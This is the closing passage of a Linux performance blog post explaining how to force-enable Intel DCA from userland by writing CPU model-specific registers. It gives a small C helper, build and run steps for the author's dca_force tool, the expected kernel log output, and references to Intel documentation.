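The loop above relies on NUM_CPUS being supplied at build time. If you would rather discover the CPU count at runtime, a sketch along these lines should work on Linux with glibc. Both helper names are made up for illustration and are not part of the code on github.

```c
#include <stdio.h>
#include <stddef.h>
#include <unistd.h>

/* Number of CPUs currently online, or 1 if the system will not say. */
long online_cpus(void)
{
    long n = sysconf(_SC_NPROCESSORS_ONLN);
    return n > 0 ? n : 1;
}

/* Build the MSR device path for one CPU, e.g. "/dev/cpu/3/msr".
 * Returns the number of characters snprintf wanted to write. */
int msr_path(int cpu, char *buf, size_t len)
{
    return snprintf(buf, len, "/dev/cpu/%d/msr", cpu);
}
```

The loop bound then becomes online_cpus() instead of NUM_CPUS, and snprintf guards against overrunning the file name buffer.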

Code for the hack is on github

Get it here: http://github.com/ice799/dca_force/tree/master

Putting it all together to get your speed boost

  1. Check out the hack from github: git clone git://github.com/ice799/dca_force.git
  2. Build the hack: make NUM_CPUS=whatever
  3. Run it: sudo ./dca_force
  4. Load the kernel module: sudo modprobe ioatdma
  5. Check your dmesg: dmesg | tail

You should see:

[   72.782249] dca service started, version 1.8
[   72.838853] ioatdma 0000:00:08.0: setting latency timer to 64
[   72.838865] ioatdma 0000:00:08.0: Intel(R) I/OAT DMA Engine found, 4 channels, device version 0x12, driver version 3.64
[   72.904027]   alloc irq_desc for 56 on cpu 0 node 0
[   72.904030]   alloc kstat_irqs on cpu 0 node 0
[   72.904039] ioatdma 0000:00:08.0: irq 56 for MSI/MSI-X

in your dmesg.

You should NOT SEE

[    8.367333] ioatdma 0000:00:08.0: DCA is disabled in BIOS

You can now enjoy the DCA performance boost your BIOS or hosting provider didn't want you to have!

Conclusion

  • Intel I/OAT and DCA are pretty cool, and enabling them can give pretty substantial performance wins
  • Cool features are sometimes stuffed away in the BIOS
  • If you don't have access to your BIOS, you should ask your provider nicely to do it for you
  • If your BIOS doesn't have a toggle switch for the feature you need, do a BIOS update
  • If all else fails and you know what you are doing, you can sometimes pull off nasty hacks like this in userland to get what you want

Thanks for reading and don't forget to subscribe (via RSS or e-mail) and follow me on twitter.

P.S.

I know, I know. I skipped Part 2 of the signals post (here's Part 1 if you missed it). Part 2 is coming soon!

References

  1. http://www.linuxfoundation.org/en/Net:I/OAT
  2. http://www.linuxfoundation.org/en/Net:I/OAT
  3. http://www.myri.com/serve/cache/626.html
  4. Intel® 7300 Chipset Memory Controller Hub (MCH) Datasheet, Section 4.8.12.6
  5. Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3B: System Programming Guide, Part 2, Appendix B-19

